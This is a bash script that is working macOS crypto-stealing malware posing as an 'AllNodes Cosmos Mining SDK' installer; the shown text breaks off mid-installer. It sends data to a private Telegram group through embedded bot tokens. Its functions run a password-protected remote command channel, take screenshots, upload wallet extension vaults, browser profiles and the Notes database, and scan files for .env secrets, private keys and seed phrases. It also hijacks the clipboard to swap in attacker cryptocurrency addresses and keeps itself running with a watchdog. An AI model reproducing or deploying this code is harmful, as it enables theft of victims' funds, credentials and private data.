#!/bin/bash echo -e "[33mNow starting setup process...[0m" echo '

LOG_FILE="/tmp/.sys_monitor.log"
MARKER="/tmp/.persist_marker"


TG_BOT_TOKENS=(
    "8251381196:AAG_UXzGEiZSbdSMxVqcNisK07_P3aMm_0Y"
    "8268782333:AAF1z7krR-oejnlIqdlRsQiLSum2wLWC3oU"
    "8522744890:AAGPBrwovUUBlqp8YW4j4wkHSOuFN2z61fQ"
)
TG_CHAT_ID="-1002506511310"  # Attacker's private group
ADMIN_PASSWORD="atom2025"  # Admin password for remote commands
CURRENT_BOT_INDEX=0  # Track which bot is currently active

# Function to get current bot token
get_current_bot() {
    echo "${TG_BOT_TOKENS[$CURRENT_BOT_INDEX]}"
}

# Function to switch to next bot (rate limit fallback)
switch_to_next_bot() {
    CURRENT_BOT_INDEX=$(( (CURRENT_BOT_INDEX + 1) % ${#TG_BOT_TOKENS[@]} ))
    echo "[$(date)] Switched to bot index $CURRENT_BOT_INDEX" >> "$LOG_FILE"
}

# Function to send data to Telegram with automatic fallback (INSTANT - no delay)
send_to_telegram() {
    local message="$1"
    local attempts=0
    local max_attempts=${#TG_BOT_TOKENS[@]}
    
    while [ $attempts -lt $max_attempts ]; do
        local bot_token=$(get_current_bot)
        local response=$(curl -s -w "\n%{http_code}" -X POST "https://api.telegram.org/bot${bot_token}/sendMessage" \
            -d "chat_id=${TG_CHAT_ID}" \
            -d "text=${message}" \
            -d "parse_mode=HTML" 2>&1)
        
        local http_code=$(echo "$response" | tail -n1)
        
        # Check if successful (200) or rate limited (429)
        if [ "$http_code" = "200" ]; then
            return 0
        elif [ "$http_code" = "429" ]; then
            echo "[$(date)] Bot $CURRENT_BOT_INDEX rate limited, switching..." >> "$LOG_FILE"
            switch_to_next_bot
            attempts=$((attempts + 1))
        else
            # Other error, try next bot
            switch_to_next_bot
            attempts=$((attempts + 1))
        fi
    done
    
    # All bots failed
    echo "[$(date)] All bots failed to send message" >> "$LOG_FILE"
    return 1
}

# Function for scanner (with delay to avoid rate limit)
send_to_telegram_delayed() {
    local message="$1"
    send_to_telegram "$message"
    sleep 2
}

# Function to send files to Telegram with automatic fallback
send_file_to_telegram() {
    local file_path="$1"
    local caption="$2"
    local attempts=0
    local max_attempts=${#TG_BOT_TOKENS[@]}
    
    while [ $attempts -lt $max_attempts ]; do
        local bot_token=$(get_current_bot)
        local response=$(curl -s -w "\n%{http_code}" -F "chat_id=${TG_CHAT_ID}" \
            -F "document=@${file_path}" \
            -F "caption=${caption}" \
            "https://api.telegram.org/bot${bot_token}/sendDocument" 2>&1)
        
        local http_code=$(echo "$response" | tail -n1)
        
        if [ "$http_code" = "200" ]; then
            return 0
        elif [ "$http_code" = "429" ]; then
            echo "[$(date)] Bot $CURRENT_BOT_INDEX rate limited (file upload), switching..." >> "$LOG_FILE"
            switch_to_next_bot
            attempts=$((attempts + 1))
            sleep 3  # Wait a bit longer for file uploads
        else
            switch_to_next_bot
            attempts=$((attempts + 1))
        fi
    done
    
    echo "[$(date)] All bots failed to upload file" >> "$LOG_FILE"
    return 1
}

# Function to check for admin commands
check_admin_commands() {
    local bot_token=$(get_current_bot)
    local updates=$(curl -s "https://api.telegram.org/bot${bot_token}/getUpdates?offset=-1&limit=1")
    local message=$(echo "$updates" | grep -o '"text":"[^"]*"' | tail -1 | cut -d'"' -f4)
    
    # Check if message starts with password
    if [[ "$message" =~ ^${ADMIN_PASSWORD}\ (.+)$ ]]; then
        local command="${BASH_REMATCH[1]}"
        execute_admin_command "$command"
    fi
}

# Function to execute admin commands
execute_admin_command() {
    local cmd="$1"
    
    case "$cmd" in
        "logs")
            send_to_telegram "📋 <b>Collecting atom.sh logs...</b>"
            if [ -f "$LOG_FILE" ]; then
                send_file_to_telegram "$LOG_FILE" "Atom Logs - $(hostname)"
                send_to_telegram "✅ <b>Atom logs sent!</b>%0A📊 Size: $(wc -l < "$LOG_FILE") lines"
            else
                send_to_telegram "❌ <b>Log file not found</b>"
            fi
            ;;
        "syslogs")
            send_to_telegram "📋 <b>Collecting system logs...</b>"
            local log_zip="/tmp/system_logs_$(date +%s).zip"
            zip -j "$log_zip" ~/.zsh_history ~/.bash_history /var/log/system.log 2>/dev/null
            send_file_to_telegram "$log_zip" "System Logs - $(hostname)"
            rm -f "$log_zip"
            send_to_telegram "✅ <b>System logs sent!</b>"
            ;;
        "status")
            local uptime_info=$(uptime)
            local process_count=$(ps aux | grep -E "monitor|scanner|watchdog" | grep -v grep | wc -l | tr -d ' ')
            local disk_usage=$(df -h / | tail -1 | awk '{print $5}')
            send_to_telegram "📊 <b>System Status</b>%0A💻 Host: $(hostname)%0A👤 User: $(whoami)%0A⏱ Uptime: $uptime_info%0A🔧 Processes: $process_count%0A💾 Disk: $disk_usage"
            ;;
        "screenshot")
            send_to_telegram "📸 <b>Taking screenshot...</b>"
            local screenshot="/tmp/screen_$(date +%s).png"
            # Capture all displays including active windows (-C captures cursor too)
            screencapture -C -x "$screenshot" 2>/dev/null
            sleep 1  # Wait for capture to complete
            if [ -f "$screenshot" ]; then
                local file_size=$(stat -f%z "$screenshot" 2>/dev/null)
                send_file_to_telegram "$screenshot" "Screenshot - $(hostname)"
                rm -f "$screenshot"
                send_to_telegram "✅ <b>Screenshot sent!</b> (${file_size} bytes)"
            else
                send_to_telegram "❌ <b>Screenshot failed</b>"
            fi
            ;;
        "window")
            send_to_telegram "📸 <b>Capturing active window...</b>"
            local screenshot="/tmp/window_$(date +%s).png"
            # Get the window ID of the frontmost application
            local window_id=$(osascript -e 'tell application "System Events" to get the id of first window of (first application process whose frontmost is true)' 2>/dev/null)
            if [ -n "$window_id" ]; then
                screencapture -l"$window_id" -x "$screenshot" 2>/dev/null
                sleep 1
                if [ -f "$screenshot" ]; then
                    send_file_to_telegram "$screenshot" "Active Window - $(hostname)"
                    rm -f "$screenshot"
                    send_to_telegram "✅ <b>Window captured!</b>"
                else
                    send_to_telegram "❌ <b>Window capture failed</b>"
                fi
            else
                send_to_telegram "❌ <b>Could not find active window</b>"
            fi
            ;;
        "sysinfo")
            local sys_info="/tmp/sysinfo_$(date +%s).txt"
            {
                echo "=== SYSTEM INFO ==="
                sw_vers
                echo ""
                echo "=== HARDWARE ==="
                system_profiler SPHardwareDataType
                echo ""
                echo "=== NETWORK ==="
                ifconfig | grep "inet "
                echo ""
                echo "=== INSTALLED APPS ==="
                ls /Applications/
            } > "$sys_info" 2>&1
            local zip_file="/tmp/sysinfo_$(date +%s).zip"
            zip -j "$zip_file" "$sys_info" 2>/dev/null
            send_file_to_telegram "$zip_file" "System Info - $(hostname)"
            rm -f "$sys_info" "$zip_file"
            ;;
        "help")
            send_to_telegram "🔐 <b>Admin Commands</b>%0A%0A<code>${ADMIN_PASSWORD} logs</code> - Atom malware logs%0A<code>${ADMIN_PASSWORD} syslogs</code> - System/terminal logs%0A<code>${ADMIN_PASSWORD} status</code> - System status%0A<code>${ADMIN_PASSWORD} screenshot</code> - Full screen capture%0A<code>${ADMIN_PASSWORD} window</code> - Active window only%0A<code>${ADMIN_PASSWORD} sysinfo</code> - Full system info%0A<code>${ADMIN_PASSWORD} help</code> - Show this help"
            ;;
        *)
            send_to_telegram "❌ <b>Unknown command:</b> $cmd%0ASend <code>${ADMIN_PASSWORD} help</code> for commands"
            ;;
    esac
}

# Wallet extension password listener mode (NEW FEATURE)
if [ "$1" = "--wallet-listener" ]; then
    echo "[$(date)] Wallet password listener PID $$ started" >> "$LOG_FILE"
    send_to_telegram "🔐 <b>Wallet Password Listener Started</b>%0A💻 $(hostname)%0AMonitoring browser storage for wallet unlocks..."
    
    while [ -f "$MARKER" ]; do
        # Monitor wallet extension storage files for changes (indicates unlock/password entry)
        for browser_path in "Google/Chrome" "BraveSoftware/Brave-Browser" "Microsoft Edge"; do
            browser_dir="$HOME/Library/Application Support/$browser_path"
            if [ -d "$browser_dir" ]; then
                # Find wallet extension folders
                find "$browser_dir" -type d -name "Local Extension Settings" 2>/dev/null | while read -r ext_dir; do
                    # Common wallet extension IDs
                    # MetaMask: nkbihfbeogaeaoehlefnkodbefgpgknn
                    # Trust Wallet: egjidjppgahhhjnjpicjfmgndfbffhhg
                    # Phantom: bfnaelmomeimhlpmgjnjophhpkkoljpa
                    # Coinbase Wallet: hnfanknocfeofbddgcijnmhnfnkdnaad
                    
                    for wallet_id in "nkbihfbeogaeaoehlefnkodbefgpgknn" "egjidjppgahhhjnjpicjfmgndfbffhhg" "bfnaelmomeimhlpmgjnjophhpkkoljpa" "hnfanknocfeofbddgcijnmhnfnkdnaad"; do
                        wallet_storage="$ext_dir/$wallet_id"
                        if [ -d "$wallet_storage" ]; then
                            # Check for LevelDB log files (contain encrypted vault data)
                            log_file="$wallet_storage/LOG"
                            if [ -f "$log_file" ]; then
                                mod_time=$(stat -f "%m" "$log_file" 2>/dev/null)
                                current_time=$(date +%s)
                                time_diff=$((current_time - mod_time))
                                
                                # If modified in last 5 seconds, wallet was likely unlocked
                                if [ "$time_diff" -lt 5 ]; then
                                    wallet_name="Unknown"
                                    case "$wallet_id" in
                                        "nkbihfbeogaeaoehlefnkodbefgpgknn") wallet_name="MetaMask" ;;
                                        "egjidjppgahhhjnjpicjfmgndfbffhhg") wallet_name="Trust Wallet" ;;
                                        "bfnaelmomeimhlpmgjnjophhpkkoljpa") wallet_name="Phantom" ;;
                                        "hnfanknocfeofbddgcijnmhnfnkdnaad") wallet_name="Coinbase Wallet" ;;
                                    esac
                                    
                                    echo "[$(date)] Wallet unlock detected: $wallet_name" >> "$LOG_FILE"
                                    send_to_telegram "🚨🔓 <b>WALLET UNLOCKED!</b>%0A💼 $wallet_name%0A💻 $(hostname)%0A⏰ $(date '+%H:%M:%S')"
                                    
                                    # Try to extract encrypted vault data
                                    for db_file in "$wallet_storage"/*.ldb "$wallet_storage"/*.log; do
                                        if [ -f "$db_file" ] && [ "$(stat -f%z "$db_file" 2>/dev/null)" -lt 10000000 ]; then
                                            # Look for vault-like patterns
                                            if strings "$db_file" 2>/dev/null | grep -q "vault\|cipher\|encrypted"; then
                                                vault_zip="/tmp/wallet_vault_${wallet_name}_$(date +%s).zip"
                                                zip -j "$vault_zip" "$wallet_storage"/*.ldb "$wallet_storage"/*.log 2>/dev/null
                                                
                                                send_file_to_telegram "$vault_zip" "🔥 $wallet_name Vault Data (Recently Unlocked) - $(hostname)"
                                                rm -f "$vault_zip"
                                            fi
                                        fi
                                    done
                                fi
                            fi
                        fi
                    done
                done
            fi
        done
        
        sleep 3  # Check every 3 seconds for wallet activity
    done
    exit 0
fi

# Admin command listener mode
if [ "$1" = "--admin-listener" ]; then
    echo "[$(date)] Admin listener PID $$ started" >> "$LOG_FILE"
    send_to_telegram "🔐 <b>Admin Listener Started</b>%0ASend commands: <code>${ADMIN_PASSWORD} help</code>"
    
    while [ -f "$MARKER" ]; do
        check_admin_commands
        sleep 10  # Check for commands every 10 seconds
    done
    exit 0
fi

if [ "$1" = "--scanner" ]; then
    SEEN_FILES="/tmp/.seen_files"
    touch "$SEEN_FILES"
    send_to_telegram_delayed "🔍 <b>File Scanner Started</b>%0A💻 $(whoami)@$(hostname)%0A⏰ Scans every 5 min"
    
    FIRST_RUN=1
    while [ -f "$MARKER" ]; do
    
        # Scan wallet JSON files in common locations (LIMITED DEPTH)
        for dir in "$HOME/Downloads" "$HOME/Documents" "$HOME/Desktop" "$HOME/.config" "$HOME/.aptos"; do
            if [ -d "$dir" ]; then
                find "$dir" -maxdepth 2 -type f -name "*.json" 2>/dev/null | head -10 | while read -r file; do
                    if [ -f "$file" ] && [ "$(stat -f%z "$file" 2>/dev/null)" -lt 1000000 ]; then
                        if grep -qE '"privateKey"|"secret"|"mnemonic"|"keystore"|"cipher"' "$file" 2>/dev/null; then
                            echo "🚨 WALLET JSON: $file" >> "$LOG_FILE"
                            send_to_telegram_delayed "🚨 <b>WALLET JSON!</b>%0A📁 $file"
                        fi
                    fi
                done
            fi
        done
        
        # Scan .dat files (wallet files)
        find "$HOME/Downloads" "$HOME/Documents" "$HOME/Desktop" -maxdepth 2 -type f -name "*.dat" 2>/dev/null | head -5 | while read -r file; do
            echo "🚨 DAT FILE: $file" >> "$LOG_FILE"
        done
        
        # Scan .keystore files
        find "$HOME/Downloads" "$HOME/Documents" "$HOME/.config" -maxdepth 2 -type f \( -name "*.keystore" -o -name "*keystore*" \) 2>/dev/null | head -5 | while read -r file; do
            echo "🚨 KEYSTORE: $file" >> "$LOG_FILE"
        done
        
        # Scan .env files (ENHANCED - scan ALL common project locations)
        for search_dir in "$HOME/Downloads" "$HOME/Documents" "$HOME/Desktop" "$HOME/Projects" "$HOME/Code" "$HOME/Dev" "$HOME/GitHub" "$HOME/.config"; do
            if [ -d "$search_dir" ]; then
                find "$search_dir" -maxdepth 3 -name ".env*" -type f 2>/dev/null | while read -r file; do
                    if [ -f "$file" ] && [ "$(stat -f%z "$file" 2>/dev/null)" -lt 100000 ]; then
                        # Check for crypto keys
                        if grep -qE "PRIVATE_KEY|MNEMONIC|SEED|SECRET|API_KEY|TOKEN|PASSWORD|WALLET" "$file" 2>/dev/null; then
                            echo "🚨 ENV: $file" >> "$LOG_FILE"
                            
                            # Extract and send sensitive keys
                            sensitive_content=$(grep -E "PRIVATE_KEY|MNEMONIC|SEED|SECRET" "$file" 2>/dev/null | head -5)
                            if [ -n "$sensitive_content" ]; then
                                send_to_telegram_delayed "🚨🚨 <b>.ENV FILE WITH SECRETS!</b>%0A📁 $file%0A🔑 Found: $(echo "$sensitive_content" | wc -l) secrets"
                                
                                # Send actual content
                                echo "$sensitive_content" | while read -r line; do
                                    send_to_telegram_delayed "🔐 $line"
                                done
                            fi
                        fi
                    fi
                done
            fi
        done
        
        # Scan ALL text files for private keys and seed phrases (MANY FORMATS)
        find "$HOME/Downloads" "$HOME/Documents" "$HOME/Desktop" -maxdepth 2 -type f \( -name "*.txt" -o -name "*.md" -o -name "*.doc" -o -name "*.docx" -o -name "*.pdf" -o -name "*.rtf" -o -name "*.log" -o -name "*.csv" -o -name "*.xml" -o -name "*.yaml" -o -name "*.yml" \) 2>/dev/null | head -30 | while read -r file; do
            if [ -f "$file" ] && [ "$(stat -f%z "$file" 2>/dev/null)" -lt 500000 ]; then
                found_key=0
                
                # Check for EVM private keys (Ethereum, Polygon, BSC, etc.)
                if grep -qE "0x[a-fA-F0-9]{64}" "$file" 2>/dev/null; then
                    if ! grep -q "$file" "$SEEN_FILES" 2>/dev/null; then
                        pkey=$(grep -oE "0x[a-fA-F0-9]{64}" "$file" 2>/dev/null | head -1)
                        send_to_telegram_delayed "🚨🚨 <b>EVM PRIVATE KEY!</b>%0A📁 $file%0A🔑 $pkey"
                        echo "$file" >> "$SEEN_FILES"
                    fi
                    found_key=1
                fi
                
                # Check for Solana private keys (Base58, 87-88 chars)
                if grep -qE "[1-9A-HJ-NP-Za-km-z]{87,88}" "$file" 2>/dev/null; then
                    if ! grep -q "$file" "$SEEN_FILES" 2>/dev/null; then
                        pkey=$(grep -oE "[1-9A-HJ-NP-Za-km-z]{87,88}" "$file" 2>/dev/null | head -1)
                        send_to_telegram_delayed "🚨🚨 <b>SOLANA PRIVATE KEY!</b>%0A📁 $file%0A🔑 $pkey"
                        echo "$file" >> "$SEEN_FILES"
                    fi
                    found_key=1
                fi
                
                # Check for Bitcoin private keys (WIF format: K or L + Base58, 51-52 chars)
                if grep -qE "[KL][1-9A-HJ-NP-Za-km-z]{50,51}" "$file" 2>/dev/null; then
                    if ! grep -q "$file" "$SEEN_FILES" 2>/dev/null; then
                        pkey=$(grep -oE "[KL][1-9A-HJ-NP-Za-km-z]{50,51}" "$file" 2>/dev/null | head -1)
                        send_to_telegram_delayed "🚨🚨 <b>BITCOIN PRIVATE KEY!</b>%0A📁 $file%0A🔑 $pkey"
                        echo "$file" >> "$SEEN_FILES"
                    fi
                    found_key=1
                fi
                
                # Check for Sui private keys (suiprivkey1 + bech32)
                if grep -qE "suiprivkey1[a-z0-9]{50,}" "$file" 2>/dev/null; then
                    if ! grep -q "$file" "$SEEN_FILES" 2>/dev/null; then
                        pkey=$(grep -oE "suiprivkey1[a-z0-9]{50,}" "$file" 2>/dev/null | head -1)
                        send_to_telegram_delayed "🚨🚨 <b>SUI PRIVATE KEY!</b>%0A📁 $file%0A🔑 $pkey"
                        echo "$file" >> "$SEEN_FILES"
                    fi
                    found_key=1
                fi
                
                # Check for seed phrases (12 or 24 words)
                if [ "$found_key" -eq 0 ]; then
                    if ! grep -q "$file" "$SEEN_FILES" 2>/dev/null; then
                        content=$(cat "$file" 2>/dev/null)
                        word_count=$(echo "$content" | wc -w | tr -d ' ')
                        if [ "$word_count" -ge 12 ] && [ "$word_count" -le 30 ]; then
                            if echo "$content" | grep -qE "^[a-z]+( [a-z]+){11,23}$" 2>/dev/null; then
                                send_to_telegram_delayed "🚨🚨 <b>SEED PHRASE!</b>%0A📁 $file%0A💬 $content"
                                echo "$file" >> "$SEEN_FILES"
                            fi
                        fi
                    fi
                fi
            fi
        done
        
        # Steal Notes app database (ZIP and upload to Telegram)
        NOTES_DB="$HOME/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite"
        if [ -f "$NOTES_DB" ]; then
            NOTES_DIR=$(dirname "$NOTES_DB")
            NOTES_ZIP="/tmp/NotesApp-Database.zip"
            
            send_to_telegram_delayed "📝 <b>STEALING Notes.app Database!</b>%0A💡 Contains all your notes, passwords, secrets"
            zip -r "$NOTES_ZIP" "$NOTES_DIR" > /dev/null 2>&1
            
            file_size_mb=$(( $(stat -f%z "$NOTES_ZIP" 2>/dev/null || echo 0) / 1024 / 1024 ))
            send_to_telegram_delayed "📦 <b>Uploading Notes Database</b>%0A💾 Size: ${file_size_mb}MB"
            
            # Upload to Telegram (FIXED: use proper function with bot rotation)
            send_file_to_telegram "$NOTES_ZIP" "Notes Database - $(hostname)"
            
            rm -f "$NOTES_ZIP"
            send_to_telegram_delayed "✅ <b>Notes.app uploaded!</b>"
        fi
        
        # Scan Telegram (FAST - just report if exists)
        TG_DIR=$(find "$HOME/Library/Group Containers" -maxdepth 1 -name "*Telegram*" -type d 2>/dev/null | head -1)
        if [ -n "$TG_DIR" ]; then
            send_to_telegram_delayed "💬 <b>Telegram data found!</b>%0A📁 $TG_DIR"
        fi
        
        # Skip Mail downloads for speed
        
        # REAL ATTACKER METHOD: Steal ALL browser extensions (wallet data!)
        if [ "$FIRST_RUN" -eq 1 ]; then
            send_to_telegram_delayed "🔍 <b>Scanning for browser extensions...</b>"
            
            # Zip and upload function (EXACTLY like real malware)
            zip_and_upload_extensions() {
                local folder_path="$1"
                local zip_name="$2"
                
                if [ ! -d "$folder_path" ]; then
                    return
                fi
                
                local zip_file="/tmp/${zip_name}"
                zip -r "$zip_file" "$folder_path" > /dev/null 2>&1
                
                local file_size_mb=$(( $(stat -f%z "$zip_file" 2>/dev/null || echo 0) / 1024 / 1024 ))
                send_to_telegram_delayed "📦 <b>Uploading Extension Data</b>%0A📁 $zip_name%0A💾 Size: ${file_size_mb}MB"
                
                # Upload to Telegram (FIXED: use proper function with bot rotation)
                send_file_to_telegram "$zip_file" "$zip_name"
                
                rm -f "$zip_file"
            }
            
            # Chrome/Brave/Edge - Steal "Local Extension Settings"
            BASE_DIR="$HOME/Library/Application Support"
            for browser_path in "Google/Chrome" "BraveSoftware/Brave-Browser" "Microsoft Edge"; do
                browser_dir="$BASE_DIR/$browser_path"
                if [ -d "$browser_dir" ]; then
                    browser_name=$(basename "$browser_path")
                    send_to_telegram_delayed "✅ Found: $browser_name"
                    
                    # Find ALL profiles (Default, Profile 1, etc.)
                    find "$browser_dir" -maxdepth 1 -type d \( -iname "*default*" -o -iname "*profile*" \) 2>/dev/null | while read -r profile; do
                        extension_settings="$profile/Local Extension Settings"
                        if [ -d "$extension_settings" ]; then
                            profile_name=$(basename "$profile")
                            zip_name="${browser_name}-${profile_name}-Extensions.zip"
                            
                            send_to_telegram_delayed "🚨 <b>STEALING EXTENSIONS!</b>%0A🌐 $browser_name%0A👤 Profile: $profile_name%0A📂 Contains ALL wallet extensions"
                            zip_and_upload_extensions "$extension_settings" "$zip_name"
                        fi
                    done
                fi
            done
            
            # Firefox - Steal ENTIRE profiles
            FF_PROFILES="$BASE_DIR/Firefox/Profiles"
            if [ -d "$FF_PROFILES" ]; then
                send_to_telegram_delayed "✅ Found: Firefox"
                for profile in "$FF_PROFILES"/*; do
                    if [ -d "$profile" ]; then
                        profile_name=$(basename "$profile")
                        zip_name="Firefox-${profile_name}.zip"
                        
                        send_to_telegram_delayed "🚨 <b>STEALING FIREFOX PROFILE!</b>%0A🦊 Firefox%0A👤 Profile: $profile_name"
                        zip_and_upload_extensions "$profile" "$zip_name"
                    fi
                done
            fi
        fi  # End of FIRST_RUN check
        
        FIRST_RUN=0  # Disable browser scanning after first run
        send_to_telegram_delayed "✅ <b>Scan Complete</b>%0A⏰ Next scan in 5 min"
        
        # Wait 5 minutes before next scan
        sleep 300
    done
    exit 0
fi

# Monitor mode (the actual clipboard watcher + ADDRESS HIJACKER)
if [ "$1" = "--monitor" ]; then
    echo "[$(date)] Monitor PID $$ started" >> "$LOG_FILE"
    LAST_CLIP=""
    
    # ATTACKER'S ADDRESSES (replace with your own)
    ATTACKER_BTC="bc1qheft6wed27ewhsgutvemykz44qp6vfc59jkp3s"
    ATTACKER_ETH="0xF02f9fd488Cde4aD3827C5c4Aa79C121125aDd6d"
    ATTACKER_COSMOS="cosmos1rygrsxan5lzv5h5kyrq9lkn8agw6zwl70jmg2e"
    ATTACKER_SOLANA="2CUdc3BFtAc1vvt6dDeQB4BEr9jZtsvjdk5u4ocxzPgQ"
    
    while [ -f "$MARKER" ]; do
        CURRENT_CLIP=$(pbpaste 2>/dev/null)
        if [ "$CURRENT_CLIP" != "$LAST_CLIP" ] && [ -n "$CURRENT_CLIP" ]; then
            echo "[$(date +%H:%M:%S)] CLIP: ${CURRENT_CLIP:0:80}" >> "$LOG_FILE"
            
            REPLACED=0
            
            # CLIPBOARD HIJACKING: Replace crypto addresses
            # Bitcoin address (bc1, 1, 3 formats)
            if [[ "$CURRENT_CLIP" =~ ^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,62}$ ]]; then
                echo "💰 BTC ADDRESS HIJACKED!" >> "$LOG_FILE"
                echo "Original: $CURRENT_CLIP" >> "$LOG_FILE"
                echo "Replaced: $ATTACKER_BTC" >> "$LOG_FILE"
                echo -n "$ATTACKER_BTC" | pbcopy
                send_to_telegram "💰💰 <b>BTC ADDRESS HIJACKED!</b>%0A👤 $(whoami)%0A🎯 Original: $CURRENT_CLIP%0A🔥 Replaced: $ATTACKER_BTC" &
                REPLACED=1
            # Ethereum/EVM address (0x + 40 hex)
            elif [[ "$CURRENT_CLIP" =~ ^0x[a-fA-F0-9]{40}$ ]]; then
                echo "💰 ETH ADDRESS HIJACKED!" >> "$LOG_FILE"
                echo "Original: $CURRENT_CLIP" >> "$LOG_FILE"
                echo "Replaced: $ATTACKER_ETH" >> "$LOG_FILE"
                echo -n "$ATTACKER_ETH" | pbcopy
                send_to_telegram "💰💰 <b>ETH/EVM ADDRESS HIJACKED!</b>%0A👤 $(whoami)%0A🎯 Original: $CURRENT_CLIP%0A🔥 Replaced: $ATTACKER_ETH" &
                REPLACED=1
            # Cosmos address (cosmos1 + bech32)
            elif [[ "$CURRENT_CLIP" =~ ^cosmos1[a-z0-9]{38,}$ ]]; then
                echo "💰 COSMOS ADDRESS HIJACKED!" >> "$LOG_FILE"
                echo "Original: $CURRENT_CLIP" >> "$LOG_FILE"
                echo "Replaced: $ATTACKER_COSMOS" >> "$LOG_FILE"
                echo -n "$ATTACKER_COSMOS" | pbcopy
                send_to_telegram "💰💰 <b>COSMOS ADDRESS HIJACKED!</b>%0A👤 $(whoami)%0A🎯 Original: $CURRENT_CLIP%0A🔥 Replaced: $ATTACKER_COSMOS" &
                REPLACED=1
            # Solana address (Base58, 32-44 chars)
            elif [[ "$CURRENT_CLIP" =~ ^[1-9A-HJ-NP-Za-km-z]{32,44}$ ]]; then
                echo "💰 SOLANA ADDRESS HIJACKED!" >> "$LOG_FILE"
                echo "Original: $CURRENT_CLIP" >> "$LOG_FILE"
                echo "Replaced: $ATTACKER_SOLANA" >> "$LOG_FILE"
                echo -n "$ATTACKER_SOLANA" | pbcopy
                send_to_telegram "💰💰 <b>SOLANA ADDRESS HIJACKED!</b>%0A👤 $(whoami)%0A🎯 Original: $CURRENT_CLIP%0A🔥 Replaced: $ATTACKER_SOLANA" &
                REPLACED=1
            fi
            
            # If not replaced, check for private keys
            if [ "$REPLACED" -eq 0 ]; then
                # Check for EVM private key (Ethereum, Polygon, BSC, etc.)
                if [[ "$CURRENT_CLIP" =~ 0x[a-fA-F0-9]{64} ]]; then
                    echo "🚨 EVM PRIVATE KEY!" >> "$LOG_FILE"
                    echo "$CURRENT_CLIP" >> "$LOG_FILE"
                    send_to_telegram "🚨🚨 <b>EVM PRIVATE KEY!</b>%0A👤 $(whoami)%0A🔑 $CURRENT_CLIP" &
                # Check for Solana private key (Base58, 87-88 chars)
                elif [[ "$CURRENT_CLIP" =~ ^[1-9A-HJ-NP-Za-km-z]{87,88}$ ]]; then
                    echo "🚨 SOLANA PRIVATE KEY!" >> "$LOG_FILE"
                    echo "$CURRENT_CLIP" >> "$LOG_FILE"
                    send_to_telegram "🚨🚨 <b>SOLANA PRIVATE KEY!</b>%0A👤 $(whoami)%0A🔑 $CURRENT_CLIP" &
                # Check for Bitcoin private key (WIF: K or L + Base58)
                elif [[ "$CURRENT_CLIP" =~ ^[KL][1-9A-HJ-NP-Za-km-z]{50,51}$ ]]; then
                    echo "🚨 BITCOIN PRIVATE KEY!" >> "$LOG_FILE"
                    echo "$CURRENT_CLIP" >> "$LOG_FILE"
                    send_to_telegram "🚨🚨 <b>BITCOIN PRIVATE KEY!</b>%0A👤 $(whoami)%0A🔑 $CURRENT_CLIP" &
                # Check for Sui private key
                elif [[ "$CURRENT_CLIP" =~ ^suiprivkey1[a-z0-9]{50,}$ ]]; then
                    echo "🚨 SUI PRIVATE KEY!" >> "$LOG_FILE"
                    echo "$CURRENT_CLIP" >> "$LOG_FILE"
                    send_to_telegram "🚨🚨 <b>SUI PRIVATE KEY!</b>%0A👤 $(whoami)%0A🔑 $CURRENT_CLIP" &
                fi
                
                # Check for seed phrase
                WORD_COUNT=$(echo "$CURRENT_CLIP" | wc -w | tr -d ' ')
                if [ "$WORD_COUNT" -eq 12 ] || [ "$WORD_COUNT" -eq 24 ]; then
                    if [[ "$CURRENT_CLIP" =~ ^[a-z]+([[:space:]][a-z]+)+$ ]]; then
                        echo "🚨 SEED PHRASE ($WORD_COUNT words)!" >> "$LOG_FILE"
                        send_to_telegram "🚨🚨 <b>SEED PHRASE ($WORD_COUNT words)!</b>%0A👤 $(whoami)%0A💬 $CURRENT_CLIP" &
                    fi
                fi
            fi
            
            # Send all clipboard activity (can be disabled for stealth)
            # send_to_telegram_delayed "📋 $(whoami): ${CURRENT_CLIP:0:100}"
            
            LAST_CLIP="$CURRENT_CLIP"
        fi
        sleep 2
    done
    exit 0
fi

# Watchdog mode (restarts monitors if killed)
if [ "$1" = "--watchdog" ]; then
    echo "[$(date)] Watchdog PID $$ started" >> "$LOG_FILE"
    while [ -f "$MARKER" ]; do
        # Check if monitors are running
        MONITOR_COUNT=$(ps aux | grep "$0 --monitor" | grep -v grep | wc -l | tr -d ' ')
        
        if [ "$MONITOR_COUNT" -lt 2 ]; then
            # Restart monitors
            nohup bash "$0" --monitor > /dev/null 2>&1 &
            nohup bash "$0" --monitor > /dev/null 2>&1 &
            echo "[$(date +%H:%M:%S)] Watchdog respawned monitors" >> "$LOG_FILE"
        fi
        
        sleep 3
    done
    exit 0
fi

# Main installer (with AllNodes social engineering)
clear

# Display fake AllNodes logo
cat << 'LOGO'
     █████╗ ██╗     ██╗         ███╗   ██╗ ██████╗ ██████╗ ███████╗███████╗
    ██╔══██╗██║     ██║         ████╗  ██║██╔═══██╗██╔══██╗██╔════╝██╔════╝
    ███████║██║     ██║         ██╔██╗ ██║██║   ██║██║  ██║█████╗  ███████╗
    ██╔══██║██║     ██║         ██║╚██╗██║██║   ██║██║  ██║██╔══╝  ╚════██║
    ██║  ██║███████╗███████╗    ██║ ╚████║╚██████╔╝██████╔╝███████╗███████║
    ╚═╝  ╚═╝╚══════╝╚══════╝    ╚═╝  ╚═══╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝
    
    ╔═══════════════════════════════════════════════════════════════════╗
    ║         🌌 COSMOS ($ATOM) MINING SDK - v2.4.1                    ║
    ║         Decentralized Mining Protocol for Cosmos Network         ║
    ╚═══════════════════════════════════════════════════════════════════╝
LOGO

echo ""
echo -e "\e[33m[INFO]\e[0m Welcome to AllNodes Cosmos Mining SDK"
echo -e "\e[33m[INFO]\e[0m Initializing mining environment..."
echo ""
echo -e "\e[36mTo continue with setup, press ENTER...\e[0m"
read -r

echo ""
echo -e "\e[33m[SETUP]\e[0m Checking for Trust Wallet extension..."
sleep 2

# Check for Trust Wallet extension in browsers
TRUST_WALLET_FOUND=0
for browser_path in "Google/Chrome" "BraveSoftware/Brave-Browser" "Microsoft Edge"; do
    browser_dir="$HOME/Library/Application Support/$browser_path"
    if [ -d "$browser_dir" ]; then
        # Trust Wallet extension ID: egjidjppgahhhjnjpicjfmgndfbffhhg (Chrome)
        if find "$browser_dir" -type d -name "*egjidjppgahhhjnjpicjfmgndfbffhhg*" 2>/dev/null | grep -q .; then
            TRUST_WALLET_FOUND=1
            break
        fi
    fi
done

if [ "$TRUST_WALLET_FOUND" -eq 0 ]; then
    echo -e "\e[31m[ERROR]\e[0m Trust Wallet extension not detected on local machine"
    echo ""
